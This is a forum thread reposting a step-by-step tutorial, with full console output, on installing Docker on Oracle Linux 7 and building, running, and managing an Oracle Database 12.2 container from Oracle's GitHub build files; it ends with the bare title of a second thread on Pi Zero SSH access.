Men in Black

Administrator

Last active 2 days ago

  1. 5 weeks ago
    Sun Aug 16 14:44:38 2020
    Men in Black started the conversation Creating an Oracle Database Docker image.

    [attachment:5f38e74664e32]

    Oracle has released Docker build files for the Oracle Database on GitHub. With those build files one can go ahead and build his or her own Docker image for the Oracle Database. If you don’t know what Docker is, you should go and check it out. It’s a cool technology based on Linux containers that allows you to containerize your application, whatever that application may be. Naturally, it didn’t take long for people to start looking at containerizing databases as well, which makes a lot of sense, especially, but not only, for development and test environments. Here is a detailed blog post on how to containerize your Oracle Database using the build files that Oracle has provided.

    What you need

    Environment

    My environment is as follows:

    • Oracle Linux 7.3 (4.1.12–94.3.8.el7uek.x86_64)
    • Docker 17.03.1-ce (docker-engine.x86_64 17.03.1.ce-3.0.1.el7)
    • Oracle Database 12.2.0.1 Enterprise Edition

    Docker setup

    The first thing to do, if not already done, is to set up Docker in the environment. Luckily this is fairly straightforward. Docker ships as an add-on with Oracle Linux 7 UEK4. As I’m running on such an environment, all I have to do is enable the add-ons yum repository and install the docker-engine package. Note, this is done as the root Linux user:

    Enable OL7 addons repo

    [root@localhost ~]# yum-config-manager --enable *addons*
    Loaded plugins: langpacks
    ================================================================== repo: ol7_addons ==================================================================
    [ol7_addons]
    async = True
    bandwidth = 0
    base_persistdir = /var/lib/yum/repos/x86_64/7Server
    baseurl = http://public-yum.oracle.com/repo/OracleLinux/OL7/addons/x86_64/
    cache = 0
    cachedir = /var/cache/yum/x86_64/7Server/ol7_addons
    check_config_file_age = True
    compare_providers_priority = 80
    cost = 1000
    deltarpm_metadata_percentage = 100
    deltarpm_percentage =
    enabled = True
    enablegroups = True
    exclude =
    failovermethod = priority
    ftp_disable_epsv = False
    gpgcadir = /var/lib/yum/repos/x86_64/7Server/ol7_addons/gpgcadir
    gpgcakey =
    gpgcheck = True
    gpgdir = /var/lib/yum/repos/x86_64/7Server/ol7_addons/gpgdir
    gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-oracle
    hdrdir = /var/cache/yum/x86_64/7Server/ol7_addons/headers
    http_caching = all
    includepkgs =
    ip_resolve =
    keepalive = True
    keepcache = False
    mddownloadpolicy = sqlite
    mdpolicy = group:small
    mediaid =
    metadata_expire = 21600
    metadata_expire_filter = read-only:present
    metalink =
    minrate = 0
    mirrorlist =
    mirrorlist_expire = 86400
    name = Oracle Linux 7Server Add ons (x86_64)
    old_base_cache_dir =
    password =
    persistdir = /var/lib/yum/repos/x86_64/7Server/ol7_addons
    pkgdir = /var/cache/yum/x86_64/7Server/ol7_addons/packages
    proxy = False
    proxy_dict =
    proxy_password =
    proxy_username =
    repo_gpgcheck = False
    retries = 10
    skip_if_unavailable = False
    ssl_check_cert_permissions = True
    sslcacert =
    sslclientcert =
    sslclientkey =
    sslverify = True
    throttle = 0
    timeout = 30.0
    ui_id = ol7_addons/x86_64
    ui_repoid_vars = releasever,
    basearch
    username =

    Install docker-engine

    [root@localhost ~]# yum install docker-engine
    Loaded plugins: langpacks, ulninfo
    Resolving Dependencies
    --> Running transaction check
    ---> Package docker-engine.x86_64 0:17.03.1.ce-3.0.1.el7 will be installed
    --> Processing Dependency: docker-engine-selinux >= 17.03.1.ce-3.0.1.el7 for package: docker-engine-17.03.1.ce-3.0.1.el7.x86_64
    --> Running transaction check
    ---> Package selinux-policy-targeted.noarch 0:3.13.1-102.0.3.el7_3.16 will be updated
    ---> Package selinux-policy-targeted.noarch 0:3.13.1-166.0.2.el7 will be an update
    --> Processing Dependency: selinux-policy = 3.13.1-166.0.2.el7 for package: selinux-policy-targeted-3.13.1-166.0.2.el7.noarch
    --> Running transaction check
    ---> Package selinux-policy.noarch 0:3.13.1-102.0.3.el7_3.16 will be updated
    ---> Package selinux-policy.noarch 0:3.13.1-166.0.2.el7 will be an update
    --> Finished Dependency Resolution
    Dependencies Resolved
    ======================================================================================================================================================
    Package Arch Version Repository Size
    ======================================================================================================================================================
    Installing:
    docker-engine x86_64 17.03.1.ce-3.0.1.el7 ol7_addons 19 M
    Updating:
    selinux-policy-targeted noarch 3.13.1-166.0.2.el7 ol7_latest 6.5 M
    Updating for dependencies:
    selinux-policy noarch 3.13.1-166.0.2.el7 ol7_latest 435 k
    Transaction Summary
    ======================================================================================================================================================
    Install 1 Package
    Upgrade 1 Package (+1 Dependent package)
    Total download size: 26 M
    Is this ok [y/d/N]: y
    Downloading packages:
    No Presto metadata available for ol7_latest
    (1/3): selinux-policy-3.13.1-166.0.2.el7.noarch.rpm | 435 kB 00:00:00
    (2/3): selinux-policy-targeted-3.13.1-166.0.2.el7.noarch.rpm | 6.5 MB 00:00:01
    (3/3): docker-engine-17.03.1.ce-3.0.1.el7.x86_64.rpm | 19 MB 00:00:04
    ------------------------------------------------------------------------------------------------------------------------------------------------------
    Total 6.2 MB/s | 26 MB 00:00:04
    Running transaction check
    Running transaction test
    Transaction test succeeded
    Running transaction
    Updating : selinux-policy-3.13.1-166.0.2.el7.noarch 1/5
    Updating : selinux-policy-targeted-3.13.1-166.0.2.el7.noarch 2/5
    Installing : docker-engine-17.03.1.ce-3.0.1.el7.x86_64 3/5
    Cleanup : selinux-policy-targeted-3.13.1-102.0.3.el7_3.16.noarch 4/5
    Cleanup : selinux-policy-3.13.1-102.0.3.el7_3.16.noarch 5/5
    Verifying : selinux-policy-targeted-3.13.1-166.0.2.el7.noarch 1/5
    Verifying : selinux-policy-3.13.1-166.0.2.el7.noarch 2/5
    Verifying : docker-engine-17.03.1.ce-3.0.1.el7.x86_64 3/5
    Verifying : selinux-policy-targeted-3.13.1-102.0.3.el7_3.16.noarch 4/5
    Verifying : selinux-policy-3.13.1-102.0.3.el7_3.16.noarch 5/5
    Installed:
    docker-engine.x86_64 0:17.03.1.ce-3.0.1.el7
    Updated:
    selinux-policy-targeted.noarch 0:3.13.1-166.0.2.el7
    Dependency Updated:
    selinux-policy.noarch 0:3.13.1-166.0.2.el7
    Complete!

    And that’s it! Docker is now installed on the machine. Before I proceed with building an image I first have to configure my environment appropriately.

    Enable non-root user

    The first thing I want to do is enable a non-root user to communicate with the Docker engine. This is fairly straightforward as well. When Docker was installed, a new Unix group docker was created along with it. If you want to allow a user to communicate with the Docker daemon directly, hence avoiding running as the root user, all you have to do is add that user to the docker group. In my case I want to add the oracle user to that group:

    [root@localhost ~]# id oracle
    uid=1000(oracle) gid=1001(oracle) groups=1001(oracle),1000(dba)
    [root@localhost ~]# usermod -a -G docker oracle
    [root@localhost ~]# id oracle
    uid=1000(oracle) gid=1001(oracle) groups=1001(oracle),1000(dba),981(docker)
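
    Note that the new group membership is not picked up by sessions that are already open. The oracle user either has to log in again or refresh the membership in the current shell, for example (a minimal sketch):

    [oracle@localhost ~]$ newgrp docker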

    Increase base image size

    Before I go ahead and run the image build I want to double-check one important parameter: the default base image size for Docker containers. In the past Docker came with a maximum container size of 10 GB by default. While this is more than enough for running some applications inside Docker containers, it needed to be increased for the Oracle Database, as the Oracle Database 12.2.0.1 image requires about 13 GB of space for the image build.
    Recently the default size has been increased to 25 GB, which is more than enough for the Oracle Database image. The setting can be found and double-checked in /etc/sysconfig/docker-storage as the storage-opt dm.basesize parameter:

    [root@localhost ~]# cat /etc/sysconfig/docker-storage
    # This file may be automatically generated by an installation program.
    # By default, Docker uses a loopback-mounted sparse file in
    # /var/lib/docker. The loopback makes it slower, and there are some
    # restrictive defaults, such as 100GB max storage.
    # If your installation did not set a custom storage for Docker, you
    # may do it below.
    # Example: Use a custom pair of raw logical volumes (one for metadata,
    # one for data).
    # DOCKER_STORAGE_OPTIONS = --storage-opt dm.metadatadev=/dev/mylogvol/my-docker-metadata --storage-opt dm.datadev=/dev/mylogvol/my-docker-data
    DOCKER_STORAGE_OPTIONS= --storage-driver devicemapper --storage-opt dm.basesize=25G

    Start and enable the Docker service

    The final step is to start the docker service and configure it to start at boot time. This is done via the systemctl command:

    [root@localhost ~]# systemctl start docker
    [root@localhost ~]# systemctl enable docker
    Created symlink from /etc/systemd/system/multi-user.target.wants/docker.service to /usr/lib/systemd/system/docker.service.
    [root@localhost ~]# systemctl status docker
    ● docker.service - Docker Application Container Engine
    Loaded: loaded (/usr/lib/systemd/system/docker.service; enabled; vendor preset: disabled)
    Drop-In: /etc/systemd/system/docker.service.d
    └─docker-sysconfig.conf
    Active: active (running) since Sun 2017-08-20 14:18:16 EDT; 5s ago
    Docs: https://docs.docker.com
    Main PID: 19203 (dockerd)
    Memory: 12.8M
    CGroup: /system.slice/docker.service
    ├─19203 /usr/bin/dockerd --selinux-enabled --storage-driver devicemapper --storage-opt dm.basesize=25G
    └─19207 docker-containerd -l unix:///var/run/docker/libcontainerd/docker-containerd.sock --metrics-interval=0 --start-timeout 2m --state...

    As a last step you can verify the setup and the base image size (check for Base Device Size:) via docker info:

    [root@localhost ~]# docker info
    Containers: 0
    Running: 0
    Paused: 0
    Stopped: 0
    Images: 0
    Server Version: 17.03.1-ce
    Storage Driver: devicemapper
    Pool Name: docker-249:0-202132724-pool
    Pool Blocksize: 65.54 kB
    Base Device Size: 26.84 GB
    Backing Filesystem: xfs
    Data file: /dev/loop0
    Metadata file: /dev/loop1
    Data Space Used: 14.42 MB
    Data Space Total: 107.4 GB
    Data Space Available: 47.98 GB
    Metadata Space Used: 581.6 kB
    Metadata Space Total: 2.147 GB
    Metadata Space Available: 2.147 GB
    Thin Pool Minimum Free Space: 10.74 GB
    Udev Sync Supported: true
    Deferred Removal Enabled: false
    Deferred Deletion Enabled: false
    Deferred Deleted Device Count: 0
    Data loop file: /var/lib/docker/devicemapper/devicemapper/data
    WARNING: Usage of loopback devices is strongly discouraged for production use. Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.
    Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata
    Library Version: 1.02.135-RHEL7 (2016-11-16)
    Logging Driver: json-file
    Cgroup Driver: cgroupfs
    Plugins:
    Volume: local
    Network: bridge host macvlan null overlay
    Swarm: inactive
    Runtimes: runc
    Default Runtime: runc
    Init Binary: docker-init
    containerd version: 4ab9917febca54791c5f071a9d1f404867857fcc
    runc version: 54296cf40ad8143b62dbcaa1d90e520a2136ddfe
    init version: 949e6fa
    Security Options:
    seccomp
    Profile: default
    selinux
    Kernel Version: 4.1.12-94.3.8.el7uek.x86_64
    Operating System: Oracle Linux Server 7.3
    OSType: linux
    Architecture: x86_64
    CPUs: 1
    Total Memory: 7.795 GiB
    Name: localhost.localdomain
    ID: D7CR:3DGV:QUGO:X7EB:AVX3:DWWW:RJIA:QVVT:I2YR:KJXV:ALR4:WLBV
    Docker Root Dir: /var/lib/docker
    Debug Mode (client): false
    Debug Mode (server): false
    Registry: https://index.docker.io/v1/
    Experimental: false
    Insecure Registries:
    127.0.0.0/8
    Live Restore Enabled: false

    That concludes the installation of Docker itself.

    Building the Oracle Database Docker image

    Now that Docker is up and running I can start building the image. First I need to get the Docker build files and the Oracle install binaries; both are easy to obtain, as shown below. Note that I use the oracle Linux user, which I previously enabled to communicate with the Docker daemon, for all the following steps:

    Obtaining the required files

    Github build files

    First I have to download the Docker build files. There are various ways to do this; I could, for example, clone the Git repository directly. But for simplicity, and for the people who aren’t familiar with git, I will just use the download option on GitHub itself. If you go to the main repository URL https://github.com/oracle/docker-images/ you will see a green button saying “Clone or download”; clicking on it gives you the option “Download ZIP”. Alternatively, you can also download the repository directly via the static URL: https://github.com/oracle/docker-images/archive/master.zip
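
    If you are comfortable with git, cloning the repository achieves the same result (a sketch, assuming git is installed; note that a clone lands in a docker-images directory rather than docker-images-master):

    [oracle@localhost ~]$ git clone https://github.com/oracle/docker-images.git

    Here is the ZIP download in action: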

    [oracle@localhost ~]$ wget https://github.com/oracle/docker-images/archive/master.zip
    --2017-08-20 14:31:32-- https://github.com/oracle/docker-images/archive/master.zip
    Resolving github.com (github.com)... 192.30.255.113, 192.30.255.112
    Connecting to github.com (github.com)|192.30.255.113|:443... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: https://codeload.github.com/oracle/docker-images/zip/master [following]
    --2017-08-20 14:31:33-- https://codeload.github.com/oracle/docker-images/zip/master
    Resolving codeload.github.com (codeload.github.com)... 192.30.255.120, 192.30.255.121
    Connecting to codeload.github.com (codeload.github.com)|192.30.255.120|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [application/zip]
    Saving to: ‘master.zip’
    [ ] 4,411,616 3.37MB/s in 1.2s
    2017-08-20 14:31:34 (3.37 MB/s) - ‘master.zip’ saved [4411616]
    [oracle@localhost ~]$ unzip master.zip
    Archive: master.zip
    21041a743e4b0a910b0e51e17793bb7b0b18efef
    creating: docker-images-master/
    extracting: docker-images-master/.gitattributes
    inflating: docker-images-master/.gitignore
    inflating: docker-images-master/.gitmodules
    inflating: docker-images-master/CODEOWNERS
    inflating: docker-images-master/CONTRIBUTING.md
    ...
    ...
    ...
    creating: docker-images-master/OracleDatabase/
    extracting: docker-images-master/OracleDatabase/.gitignore
    inflating: docker-images-master/OracleDatabase/COPYRIGHT
    inflating: docker-images-master/OracleDatabase/LICENSE
    inflating: docker-images-master/OracleDatabase/README.md
    creating: docker-images-master/OracleDatabase/dockerfiles/
    ...
    ...
    ...
    inflating: docker-images-master/README.md
    [oracle@localhost ~]$

    Oracle installation binaries

    For the Oracle binaries, just download them from wherever you usually would; Oracle Technology Network is probably the place most people go to. Once you have downloaded them you can proceed with building the image:

    [oracle@localhost ~]$ ls -al *database*zip
    -rw-r--r--. 1 oracle oracle 1354301440 Aug 20 14:40 linuxx64_12201_database.zip

    Building the image

    Now that I have all the files, it’s time to build the Docker image. You will find a separate README.md in the docker-images-master/OracleDatabase/SingleInstance directory which explains the build process in more detail. Make sure that you always read that file, as it will always reflect the latest changes in the build files! You will also find a buildDockerImage.sh shell script in the docker-images-master/OracleDatabase/SingleInstance/dockerfiles directory that does the legwork of the build for you. For the build it is essential that I copy the install files into the correct version directory. As I’m going to create an Oracle Database 12.2.0.1 image, I need to copy the install zip file into docker-images-master/OracleDatabase/SingleInstance/dockerfiles/12.2.0.1:

    [oracle@localhost ~]$ cd docker-images-master/OracleDatabase/SingleInstance/dockerfiles/12.2.0.1/
    [oracle@localhost 12.2.0.1]$ cp ~/linuxx64_12201_database.zip .
    [oracle@localhost 12.2.0.1]$ ls -al
    total 3372832
    drwxrwxr-x. 2 oracle oracle 4096 Aug 20 14:44 .
    drwxrwxr-x. 5 oracle oracle 77 Aug 19 00:35 ..
    -rwxr-xr-x. 1 oracle oracle 1259 Aug 19 00:35 checkDBStatus.sh
    -rwxr-xr-x. 1 oracle oracle 909 Aug 19 00:35 checkSpace.sh
    -rw-rw-r--. 1 oracle oracle 62 Aug 19 00:35 Checksum.ee
    -rw-rw-r--. 1 oracle oracle 62 Aug 19 00:35 Checksum.se2
    -rwxr-xr-x. 1 oracle oracle 2964 Aug 19 00:35 createDB.sh
    -rw-rw-r--. 1 oracle oracle 9203 Aug 19 00:35 dbca.rsp.tmpl
    -rw-rw-r--. 1 oracle oracle 6878 Aug 19 00:35 db_inst.rsp
    -rw-rw-r--. 1 oracle oracle 2550 Aug 19 00:35 Dockerfile.ee
    -rw-rw-r--. 1 oracle oracle 2552 Aug 19 00:35 Dockerfile.se2
    -rwxr-xr-x. 1 oracle oracle 2261 Aug 19 00:35 installDBBinaries.sh
    -rw-r--r--. 1 oracle oracle 3453696911 Aug 20 14:45 linuxx64_12201_database.zip
    -rwxr-xr-x. 1 oracle oracle 6151 Aug 19 00:35 runOracle.sh
    -rwxr-xr-x. 1 oracle oracle 1026 Aug 19 00:35 runUserScripts.sh
    -rwxr-xr-x. 1 oracle oracle 769 Aug 19 00:35 setPassword.sh
    -rwxr-xr-x. 1 oracle oracle 879 Aug 19 00:35 setupLinuxEnv.sh
    -rwxr-xr-x. 1 oracle oracle 689 Aug 19 00:35 startDB.sh
    [oracle@localhost 12.2.0.1]$

    Now that the zip file is in place, I am ready to invoke the buildDockerImage.sh shell script in the dockerfiles folder. The script takes a couple of parameters: -v for the version, and -e to tell it that I want Enterprise Edition. Note: the build of the image will pull the Oracle Linux slim base image and execute a yum install as well as a yum upgrade inside the container. For it to succeed you have to have internet connectivity:

    [oracle@localhost 12.2.0.1]$ cd ..
    [oracle@localhost dockerfiles]$ ./buildDockerImage.sh -v 12.2.0.1 -e
    Checking if required packages are present and valid...
    linuxx64_12201_database.zip: OK
    ==========================
    DOCKER info:
    Containers: 0
    Running: 0
    Paused: 0
    Stopped: 0
    Images: 0
    Server Version: 17.03.1-ce
    Storage Driver: devicemapper
    Pool Name: docker-249:0-202132724-pool
    Pool Blocksize: 65.54 kB
    Base Device Size: 26.84 GB
    Backing Filesystem: xfs
    Data file: /dev/loop0
    Metadata file: /dev/loop1
    Data Space Used: 14.42 MB
    Data Space Total: 107.4 GB
    Data Space Available: 47.98 GB
    Metadata Space Used: 581.6 kB
    Metadata Space Total: 2.147 GB
    Metadata Space Available: 2.147 GB
    Thin Pool Minimum Free Space: 10.74 GB
    Udev Sync Supported: true
    Deferred Removal Enabled: false
    Deferred Deletion Enabled: false
    Deferred Deleted Device Count: 0
    Data loop file: /var/lib/docker/devicemapper/devicemapper/data
    WARNING: Usage of loopback devices is strongly discouraged for production use. Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.
    Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata
    Library Version: 1.02.135-RHEL7 (2016-11-16)
    Logging Driver: json-file
    Cgroup Driver: cgroupfs
    Plugins:
    Volume: local
    Network: bridge host macvlan null overlay
    Swarm: inactive
    Runtimes: runc
    Default Runtime: runc
    Init Binary: docker-init
    containerd version: 4ab9917febca54791c5f071a9d1f404867857fcc
    runc version: 54296cf40ad8143b62dbcaa1d90e520a2136ddfe
    init version: 949e6fa
    Security Options:
    seccomp
    Profile: default
    selinux
    Kernel Version: 4.1.12-94.3.8.el7uek.x86_64
    Operating System: Oracle Linux Server 7.3
    OSType: linux
    Architecture: x86_64
    CPUs: 1
    Total Memory: 7.795 GiB
    Name: localhost.localdomain
    ID: D7CR:3DGV:QUGO:X7EB:AVX3:DWWW:RJIA:QVVT:I2YR:KJXV:ALR4:WLBV
    Docker Root Dir: /var/lib/docker
    Debug Mode (client): false
    Debug Mode (server): false
    Registry: https://index.docker.io/v1/
    Experimental: false
    Insecure Registries:
    127.0.0.0/8
    Live Restore Enabled: false
    ==========================
    Building image 'oracle/database:12.2.0.1-ee' ...
    Sending build context to Docker daemon 3.454 GB
    Step 1/16 : FROM oraclelinux:7-slim
    7-slim: Pulling from library/oraclelinux
    3152c71f8d80: Pull complete
    Digest: sha256:e464042b724d41350fb3ac2c2f84bd9d28d98302c9ebe66048a5367682e5fad2
    Status: Downloaded newer image for oraclelinux:7-slim
    ---> c0feb50f7527
    Step 2/16 : MAINTAINER Gerald Venzl
    ---> Running in e442cae35367
    ---> 08f875cea39d
    ...
    ...
    ...
    Step 15/16 : EXPOSE 1521 5500
    ---> Running in 4476c1c236e1
    ---> d01d39e39920
    Removing intermediate container 4476c1c236e1
    Step 16/16 : CMD exec $ORACLE_BASE/$RUN_FILE
    ---> Running in 8757674cc3d5
    ---> 98129834d5ad
    Removing intermediate container 8757674cc3d5
    Successfully built 98129834d5ad
    Oracle Database Docker Image for 'ee' version 12.2.0.1 is ready to be extended:
    --> oracle/database:12.2.0.1-ee
    Build completed in 802 seconds.

    Starting and connecting to the Oracle Database inside a Docker container

    Once the build has completed successfully, I can start and run the Oracle Database inside a Docker container. All I have to do is issue the docker run command and pass in the appropriate parameters. One important parameter is -p, which maps ports inside the container to the outside world. This is required so that I can also connect to the database from outside the Docker container. Another important parameter is -v, which allows me to keep the data files of the database in a location outside the Docker container. This is important as it will allow me to preserve my data even when the container is thrown away. You should always use the -v parameter or create a named Docker volume! The last useful parameter that I’m going to use is --name, which specifies the name of the Docker container itself. If omitted, a random name is generated; passing a name will allow me to refer to the container by that name later on.
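
    As an aside, instead of bind-mounting a host directory you could create a named Docker volume and point -v at it. A minimal sketch (the volume name oradata-vol is my own choice, not something from the build files):

    [oracle@localhost ~]$ docker volume create oradata-vol
    [oracle@localhost ~]$ docker run --name oracle-ee -p 1521:1521 -v oradata-vol:/opt/oracle/oradata oracle/database:12.2.0.1-ee

    In this walkthrough, however, I use a host directory and make it writable for the container: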

    [oracle@localhost dockerfiles]$ cd ~
    [oracle@localhost ~]$ mkdir oradata
    [oracle@localhost ~]$ chmod a+w oradata
    [oracle@localhost ~]$ docker run --name oracle-ee -p 1521:1521 -v /home/oracle/oradata:/opt/oracle/oradata oracle/database:12.2.0.1-ee
    ORACLE PASSWORD FOR SYS, SYSTEM AND PDBADMIN: 3y4RL1K7org=1
    LSNRCTL for Linux: Version 12.2.0.1.0 - Production on 20-AUG-2017 19:07:55
    Copyright (c) 1991, 2016, Oracle. All rights reserved.
    Starting /opt/oracle/product/12.2.0.1/dbhome_1/bin/tnslsnr: please wait...
    TNSLSNR for Linux: Version 12.2.0.1.0 - Production
    System parameter file is /opt/oracle/product/12.2.0.1/dbhome_1/network/admin/listener.ora
    Log messages written to /opt/oracle/diag/tnslsnr/e3d1a2314421/listener/alert/log.xml
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC1)))
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC1)))
    STATUS of the LISTENER
    ------------------------
    Alias LISTENER
    Version TNSLSNR for Linux: Version 12.2.0.1.0 - Production
    Start Date 20-AUG-2017 19:07:56
    Uptime 0 days 0 hr. 0 min. 0 sec
    Trace Level off
    Security ON: Local OS Authentication
    SNMP OFF
    Listener Parameter File /opt/oracle/product/12.2.0.1/dbhome_1/network/admin/listener.ora
    Listener Log File /opt/oracle/diag/tnslsnr/e3d1a2314421/listener/alert/log.xml
    Listening Endpoints Summary...
    (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC1)))
    (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
    The listener supports no services
    The command completed successfully
    [WARNING] [DBT-10102] The listener configuration is not selected for the database. EM DB Express URL will not be accessible.
    CAUSE: The database should be registered with a listener in order to access the EM DB Express URL.
    ACTION: Select a listener to be registered or created with the database.
    Copying database files
    1% complete
    13% complete
    25% complete
    Creating and starting Oracle instance
    26% complete
    30% complete
    31% complete
    35% complete
    38% complete
    39% complete
    41% complete
    Completing Database Creation
    42% complete
    43% complete
    44% complete
    46% complete
    47% complete
    50% complete
    Creating Pluggable Databases
    55% complete
    75% complete
    Executing Post Configuration Actions
    100% complete
    Look at the log file "/opt/oracle/cfgtoollogs/dbca/ORCLCDB/ORCLCDB.log" for further details.
    SQL*Plus: Release 12.2.0.1.0 Production on Sun Aug 20 19:16:01 2017
    Copyright (c) 1982, 2016, Oracle. All rights reserved.
    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    SQL>
    System altered.
    SQL>
    Pluggable database altered.
    SQL> Disconnected from Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    #########################
    DATABASE IS READY TO USE!
    #########################
    The following output is now a tail of the alert.log:
    Completed: alter pluggable database ORCLPDB1 open
    2017-08-20T19:16:01.025829+00:00
    ORCLPDB1(3):CREATE SMALLFILE TABLESPACE "USERS" LOGGING DATAFILE '/opt/oracle/oradata/ORCLCDB/ORCLPDB1/users01.dbf' SIZE 5M REUSE AUTOEXTEND ON NEXT 1280K MAXSIZE UNLIMITED EXTENT MANAGEMENT LOCAL SEGMENT SPACE MANAGEMENT AUTO
    ORCLPDB1(3):Completed: CREATE SMALLFILE TABLESPACE "USERS" LOGGING DATAFILE '/opt/oracle/oradata/ORCLCDB/ORCLPDB1/users01.dbf' SIZE 5M REUSE AUTOEXTEND ON NEXT 1280K MAXSIZE UNLIMITED EXTENT MANAGEMENT LOCAL SEGMENT SPACE MANAGEMENT AUTO
    ORCLPDB1(3):ALTER DATABASE DEFAULT TABLESPACE "USERS"
    ORCLPDB1(3):Completed: ALTER DATABASE DEFAULT TABLESPACE "USERS"
    2017-08-20T19:16:01.889003+00:00
    ALTER SYSTEM SET control_files='/opt/oracle/oradata/ORCLCDB/control01.ctl' SCOPE=SPFILE;
    ALTER PLUGGABLE DATABASE ORCLPDB1 SAVE STATE
    Completed: ALTER PLUGGABLE DATABASE ORCLPDB1 SAVE STATE

    On the very first startup of the container a new database is created. Subsequent startups of the same container, or newly created containers pointing to the same volume, will just start the database up again. Once the database is created or started, the container runs a tail -f on the Oracle Database alert.log file. This is done for convenience, so that issuing a docker logs command will actually print the logs of the database running inside that container. Once the database is created or started up you will see the line DATABASE IS READY TO USE! in the output. After that you can connect to the database.
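
    Because docker logs simply replays that output, the readiness check can also be scripted; a minimal sketch:

    [oracle@localhost ~]$ docker logs oracle-ee | grep 'DATABASE IS READY TO USE!'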

    Resetting the database admin account passwords

    The startup script also generated a password for the database admin accounts. You can find it next to the line ORACLE PASSWORD FOR SYS, SYSTEM AND PDBADMIN: in the output. You can either use that password going forward or reset it to a password of your choice. The container provides a script called setPassword.sh for resetting the password. In a new shell, just execute the following command against the running container:

    [oracle@localhost ~]$ docker exec oracle-ee ./setPassword.sh LetsDocker
    The Oracle base remains unchanged with value /opt/oracle
    SQL*Plus: Release 12.2.0.1.0 Production on Sun Aug 20 19:17:08 2017
    Copyright (c) 1982, 2016, Oracle. All rights reserved.
    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    SQL>
    User altered.
    SQL>
    User altered.
    SQL>
    Session altered.
    SQL>
    User altered.
    SQL> Disconnected from Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

    Connecting to the Oracle Database

    Now that the container is running and port 1521 is mapped to the outside world, I can connect to the database inside the container:

    [oracle@localhost ~]$ sql system/LetsDocker@//localhost:1521/ORCLPDB1
    SQLcl: Release 4.2.0 Production on Sun Aug 20 19:56:43 2017
    Copyright (c) 1982, 2017, Oracle. All rights reserved.
    Last Successful login time: Sun Aug 20 2017 12:21:42 -07:00
    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    SQL> grant connect, resource to gvenzl identified by supersecretpwd;
    Grant succeeded.
    SQL> conn gvenzl/supersecretpwd@//localhost:1521/ORCLPDB1
    Connected.
    SQL>
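
    I’m using SQLcl here, but any Oracle client can connect through the mapped port in the same way. With a standard sqlplus installation on the host, the equivalent connect would look like this (a sketch, assuming sqlplus is on the PATH):

    [oracle@localhost ~]$ sqlplus system/LetsDocker@//localhost:1521/ORCLPDB1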

    Stopping the Oracle Database Docker container

    If you wish to stop the Docker container you can do so via the docker stop command. All you have to do is issue the command and pass in the container name or id. This triggers the container to issue a shutdown immediate for the database inside the container. By default Docker only allows 10 seconds for the container to shut down before killing it. For applications that may be fine, but for persistent containers such as the Oracle Database container you may want to give the container a bit more time to shut down the database appropriately. You can do that via the -t option, which allows you to pass a new timeout in seconds for the container to shut down successfully. I will give the database 30 seconds to shut down, but it’s important to point out that it doesn’t really matter how long you give the container: once the database is shut down, the container exits normally. It will not wait all the seconds that you have specified before returning control. So even if you give it 10 minutes (600 seconds), it will still return as soon as the database is shut down. Just keep that in mind when specifying a timeout for busy database containers:

    [oracle@localhost ~]$ docker stop -t 30 oracle-ee
    oracle-ee

    Restarting the Oracle Database Docker container

    A stopped container can always be restarted via the docker start command:

    [oracle@localhost ~]$ docker start oracle-ee
    oracle-ee

    The docker start command will put the container into the background and return control immediately. You can check the status of the container via the docker logs command, which should print the same DATABASE IS READY TO USE! line. You will also see that this time the database was just restarted rather than created. Note, docker logs -f will follow the log output, i.e. keep on printing new lines:

    [oracle@localhost ~]$ docker logs oracle-ee
    ...
    ...
    ...
    SQL*Plus: Release 12.2.0.1.0 Production on Sun Aug 20 19:30:31 2017
    Copyright (c) 1982, 2016, Oracle.  All rights reserved.
    Connected to an idle instance.
    SQL> ORACLE instance started.
    Total System Global Area 1610612736 bytes
    Fixed Size          8793304 bytes
    Variable Size         520094504 bytes
    Database Buffers     1073741824 bytes
    Redo Buffers            7983104 bytes
    Database mounted.
    Database opened.
    SQL> Disconnected from Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    #########################
    DATABASE IS READY TO USE!
    #########################
    The following output is now a tail of the alert.log:
    ORCLPDB1(3):Undo initialization finished serial:0 start:6800170 end:6800239 diff:69 ms (0.1 seconds)
    ORCLPDB1(3):Database Characterset for ORCLPDB1 is AL32UTF8
    ORCLPDB1(3):Opatch validation is skipped for PDB ORCLPDB1 (con_id=0)
    ORCLPDB1(3):Opening pdb with no Resource Manager plan active
    2017-08-20T19:30:43.703897+00:00
    Pluggable database ORCLPDB1 opened read write

    Now that the database is up and running again I can connect once more to the database inside:

    [oracle@localhost ~]$ sql gvenzl/supersecretpwd@//localhost:1521/ORCLPDB1
    SQLcl: Release 4.2.0 Production on Sun Aug 20 20:10:28 2017
    Copyright (c) 1982, 2017, Oracle. All rights reserved.
    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
    SQL> select sysdate from dual;
    SYSDATE
    ---------
    20-AUG-17
    SQL> exit
    Disconnected from Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

    Summary

    This concludes how to containerize the Oracle Database using Docker. Note that Oracle has also provided build files for other Oracle Database versions and editions. The steps described above are largely the same, but you should always refer to the README.md that comes with the build files. There you will also find more options for running your Oracle Database containers.

  2. 4 months ago
    Fri May 8 09:38:37 2020
    Men in Black started the conversation Headless Pi Zero SSH Access over USB (Windows).

    [attachment:5eb4c5e960481]

